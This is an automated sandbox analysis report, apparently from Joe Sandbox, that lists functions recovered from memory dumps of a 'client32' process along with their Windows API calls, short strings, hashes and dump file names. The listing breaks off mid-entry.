Opcode ID: 1ffc49bf21bc22a0f4a1d5955121b07249d6265c34fad82c13cbcbb638d29bf5
Instruction ID: 8bfac25b49e71cc13f9bd6a533df2646dcc5441f008cb26bc275a7be4dbae262
Opcode Fuzzy Hash: 1ffc49bf21bc22a0f4a1d5955121b07249d6265c34fad82c13cbcbb638d29bf5
Instruction Fuzzy Hash: 07F0E9B53852147BF52056494C46FBF7A5CCB86B79F304225FB18AB2C0E6E07C0142BA

Function 11131380 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
CreateFontIndirectA.GDI32(?), ref: 111313CF
CreateFontIndirectA.GDI32(?), ref: 111313E5
CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoParametersSystem
String ID:
API String ID: 3386289337-0
Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51

Function 68C65B30 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898), ref: 68C65B45
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C65B76
SetEvent.KERNEL32(000002F8), ref: 68C65B8E
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C65B99

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 4a124e6e700c3278b540fb7ae4571d6c930c2b513f776623fe5907ec1c2e57eb
Instruction ID: d9fda8b07def155e808dc65a72bd87fea7a08432f104594ee0eedafd35016e9d
Opcode Fuzzy Hash: 4a124e6e700c3278b540fb7ae4571d6c930c2b513f776623fe5907ec1c2e57eb
Instruction Fuzzy Hash: CBF0F67240015DEFCF119FA8D4884AE7B74E7433B93948016F8AA57802F330EC81CBA0

Function 68C65AC0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898), ref: 68C65AD0
_memmove.LIBCMT ref: 68C65AEC
_memmove.LIBCMT ref: 68C65B0A
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C65B17

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection_memmove$EnterLeave
String ID:
API String ID: 324922381-0
Opcode ID: 82fe697ba0019d16eec64155bf70492974dadd4adb677cd5a2eb2cb8c86cb882
Instruction ID: 96d4a14ecbedcd6410b78271195c48084466881211cb45644411990de3c8df2a
Opcode Fuzzy Hash: 82fe697ba0019d16eec64155bf70492974dadd4adb677cd5a2eb2cb8c86cb882
Instruction Fuzzy Hash: 27F0127960011DAFEA549F6CD8C5C3F77B9EB857583984529F85587B01E721EC80CBA0

Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
SetFocus.USER32(?), ref: 11007383

Strings

edit, xrefs: 11007321

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_memsetwsprintf
String ID: edit
API String ID: 133491855-2167791130
Opcode ID: 90178d24ed7dd829a3d0cac89e5aa5b0d91151dfc4ee68e84738eaf518688980
Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
Opcode Fuzzy Hash: 90178d24ed7dd829a3d0cac89e5aa5b0d91151dfc4ee68e84738eaf518688980
Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61

Function 68C70DC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C70EEB
__CxxThrowException@8.LIBCMT ref: 68C70F00

Strings

PIN, xrefs: 68C70E44

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: PIN
API String ID: 1338273076-589459321
Opcode ID: 29142e8a9d41b4583b8a7931c93dda42ddfd9ca8e41aecc21e10689450c03752
Instruction ID: 427a947b71351bb0f1a0f0826dea9a28edf393778278d92ec3bfba8d69958c0a
Opcode Fuzzy Hash: 29142e8a9d41b4583b8a7931c93dda42ddfd9ca8e41aecc21e10689450c03752
Instruction Fuzzy Hash: B2412CB5D0024CAFDF50DFE8D8809AEBBB8FB48314F90452EE42AA7240F7355A05CB51

Function 68C6FB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 68C6FBD5
_memmove.LIBCMT ref: 68C6FC26

Part of subcall function 68C6F470: std::_Xinvalid_argument.LIBCPMT ref: 68C6F48A

Strings

string too long, xrefs: 68C6FBD0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: ad4a4170839b62c399995d6cae0bc1f87bf8d138fea1bf5d45995f427e25c993
Instruction ID: ecbc63ab3e4e4bd2c8fce80332e044e4cd2d0983d5f787c42b469e41c6710315
Opcode Fuzzy Hash: ad4a4170839b62c399995d6cae0bc1f87bf8d138fea1bf5d45995f427e25c993
Instruction Fuzzy Hash: FC31F5323216105FD3208E5CA8D096AF7E9EFD5674BA44A3BE4A1C7640E7E19CC183A1

Function 11073384 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110734DE

Part of subcall function 1100A6E0: _memmove.LIBCMT ref: 1100A76D
Part of subcall function 1100A6E0: _free.LIBCMT ref: 1100A7D8

Strings

Error. audio hash (%d) without format, xrefs: 1107347D
Guessed audiofmt, setting cfg..., xrefs: 1107349E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$_memmove
String ID: Error. audio hash (%d) without format$Guessed audiofmt, setting cfg...
API String ID: 2660578203-1909739491
Opcode ID: 8e06cdea53807ab9085b6da1c4420ac907d4d54218d225880a4861d0d302c7bd
Instruction ID: 90ff59978ee9faf1ea77bf5b3d58e553fcef671930129f1970ae28b72db18f4b
Opcode Fuzzy Hash: 8e06cdea53807ab9085b6da1c4420ac907d4d54218d225880a4861d0d302c7bd
Instruction Fuzzy Hash: A431C1BDD143169BE3548F20D884BA7BBA8EB90314F100D1BF85DCB101D775FA9087A5

Function 11009220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11009295
_memmove.LIBCMT ref: 110092E6

Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A

Strings

string too long, xrefs: 11009290

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
Instruction ID: be305049c21c6d802d82ad86ff43ec2f0153ea4b5fc4fe3555ff5b1edb8d11a0
Opcode Fuzzy Hash: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
Instruction Fuzzy Hash: 0A31DB32F046109BF720DD9CE88095AF7EDEFA57A4B20462FE58AC7740EB719C4487A0

Function 68C679C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 68C67AA4
_free.LIBCMT ref: 68C67AB0

Strings

DATA, xrefs: 68C679FC

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: DATA
API String ID: 269201875-2607161047
Opcode ID: 8a943161fb3163bc8f02ce1f210cf713c562ee077d7cc387a55086b10f8b53d4
Instruction ID: 23ce47f5385b3484c66fe6d0ebefb1201deca1354531d663c3a27f983d987ff7
Opcode Fuzzy Hash: 8a943161fb3163bc8f02ce1f210cf713c562ee077d7cc387a55086b10f8b53d4
Instruction Fuzzy Hash: AC31B1B5D00109ABEB01CBA88C41BBF7BF89F45224F848679E829E7201F7349B4597E1

Function 1100F0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F10B

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

std::_Xinvalid_argument.LIBCPMT ref: 1100F122

Strings

string too long, xrefs: 1100F106, 1100F11D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
Instruction ID: 820ae926dfc744509ffc298ffbf7719e1583de006a97f4842800b066cd7400cd
Opcode Fuzzy Hash: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
Instruction Fuzzy Hash: BA11D632B046145BE321DD5CE880BAAF7EDEF966A4F10066FF591CB640CBA1A80593A1

Function 68C78BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 68C78C18
_memmove.LIBCMT ref: 68C78C6A

Strings

@, xrefs: 68C78C42

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: @
API String ID: 4104443479-2766056989
Opcode ID: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
Instruction ID: 0b80968bedd19d6b7bef944c299b944e3b07198432eacb378e20bc583ba45fda
Opcode Fuzzy Hash: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
Instruction Fuzzy Hash: E01126B6540309AFDB20CF54DCC0DAB377DEB94218F544A2DEA164B201F770EA4AC7A5

Function 68C6C890 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 68C6C8A6

Part of subcall function 68C81960: std::exception::exception.LIBCMT ref: 68C81975
Part of subcall function 68C81960: __CxxThrowException@8.LIBCMT ref: 68C8198A
Part of subcall function 68C81960: std::exception::exception.LIBCMT ref: 68C8199B

_memmove.LIBCMT ref: 68C6C8DF

Strings

invalid string position, xrefs: 68C6C8A1

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: d3e50b407e9b0aace6cb20f9652fa1d4a492eb59e37ea89b8487e31d89941994
Instruction ID: 5cbdae0584338b9ce7c704d60899ceda370d0dd393240b21d333dbea4acb7ab3
Opcode Fuzzy Hash: d3e50b407e9b0aace6cb20f9652fa1d4a492eb59e37ea89b8487e31d89941994
Instruction Fuzzy Hash: 1001DB327442149BD734CA6CDCC051AB7E6EBC5724B64493ED191C7B05E675EC8283A1

Function 110633A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,62C07B5E,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

event, xrefs: 11063415
..\ctl32\Connect.cpp, xrefs: 11063410

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Connect.cpp$event
API String ID: 3621156866-397488498
Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90

Function 11019140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019155

